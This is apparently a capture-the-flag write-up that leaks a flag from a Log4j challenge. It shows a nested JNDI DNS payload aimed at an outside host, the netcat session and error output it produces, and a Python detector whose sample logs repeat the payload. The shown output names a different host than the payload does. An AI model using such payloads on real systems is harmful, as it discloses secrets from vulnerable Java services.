Tags: misc log4j sanity 

Rating: 4.5

It can be seen from the Dockerfile that the `FLAG` environment variable contains the flag.

```dockerfile
CMD ynetd -np y -lm -1 -lpid 64 -lt 10 -t 30 "FLAG='$(cat /flag.txt)' /home/ctf/run.sh"
```

We can leak this with the following string:

```
${jndi:dns://pwn.nandynarwhals.org/leak=${env:FLAG:-lol}}
```

Using this payload leaks the flag in the error messages: Log4j resolves the nested `${env:FLAG:-lol}` lookup first, so the flag becomes part of the DNS name that the JNDI DNS provider then tries to parse. A single DNS label may not exceed 63 octets, so the provider rejects the name and logs the offending label, flag included, in the exception message.

```console
nc 65.108.176.77 1337
What is your favourite CTF?
${jndi:dns://pwn.nandynarwhals.org/leak=${env:FLAG:-lol}}
:(
2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource [dns://border.spro.ink/leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name 'leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}'
at jdk.naming.dns/com.sun.jndi.dns.DnsName.verifyLabel(DnsName.java:487)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.add(DnsName.java:306)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.parse(DnsName.java:446)
at jdk.naming.dns/com.sun.jndi.dns.DnsName.<init>(DnsName.java:135)
at jdk.naming.dns/com.sun.jndi.dns.DnsContext.fullyQualify(DnsContext.java:588)
at jdk.naming.dns/com.sun.jndi.dns.DnsContext.c_lookup(DnsContext.java:288)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
...
```
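As an added example for the defender's side (not code from the original writeup), the Python below parses nested `${...}` lookups to flag a `jndi:` lookup that embeds a context lookup such as `env:` or `sys:`, and it recovers the name the DNS provider echoed back in its `InvalidNameException` so an incident responder can see exactly what was disclosed. The sample log lines, hostname and flag value are constructed.

```python
import re
from typing import Optional

# Lookup types whose substituted value would disclose process context.
CONTEXT_LOOKUPS = ("env:", "sys:", "java:", "main:")
# Shape of the message the JNDI DNS provider logs for an over-long label.
LABEL_RE = re.compile(r"Label exceeds 63 octets: (.+?); remaining name '")
RESOURCE_RE = re.compile(r"Error looking up JNDI resource \[(.+?)\]\.")

# Constructed sample data (not from the original writeup); the label is built
# to be longer than 63 octets so the WARN line is self-consistent.
LEAKED_LABEL = "leak=hxp{constructed_flag_long_enough_to_exceed_the_63_octet_dns_label_limit}"
SAMPLE_LOGS = [
    "2021-12-19 21:15:05,900 main INFO favourite: "
    "${jndi:dns://attacker.invalid/leak=${env:FLAG:-lol}}",
    "2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource "
    f"[dns://attacker.invalid/{LEAKED_LABEL}]. javax.naming.InvalidNameException: "
    f"Label exceeds 63 octets: {LEAKED_LABEL}; remaining name '{LEAKED_LABEL}'",
    "2021-12-19 21:15:07,000 main INFO favourite: hxp ctf",
]


def parse_lookups(text: str):
    """Return (depth, body) for every ${...} in text; depth 0 is the outermost."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)          # remember where this lookup opened
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()      # innermost lookups close first
            found.append((len(stack), text[start + 2:i]))
        i += 1
    return found


def leaked_name(line: str) -> Optional[str]:
    """Recover the name JNDI echoed back in an InvalidNameException, if any."""
    m = LABEL_RE.search(line) or RESOURCE_RE.search(line)
    return m.group(1) if m else None


def assess(line: str) -> dict:
    """Flag a jndi: lookup, any nested context lookups inside it, and echoed-back names."""
    lookups = parse_lookups(line)
    jndi = any(b.lower().startswith("jndi:") for _, b in lookups)
    nested = [b for d, b in lookups if d > 0 and b.lower().startswith(CONTEXT_LOOKUPS)]
    return {"jndi": jndi, "nested": nested, "leaked": leaked_name(line)}


def scan(lines):
    """Return (line number, assessment) for lines worth an analyst's attention."""
    hits = []
    for n, line in enumerate(lines, 1):
        a = assess(line)
        if a["jndi"] or a["leaked"]:
            hits.append((n, a))
    return hits
```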

Full writeup here: [https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/](https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/)
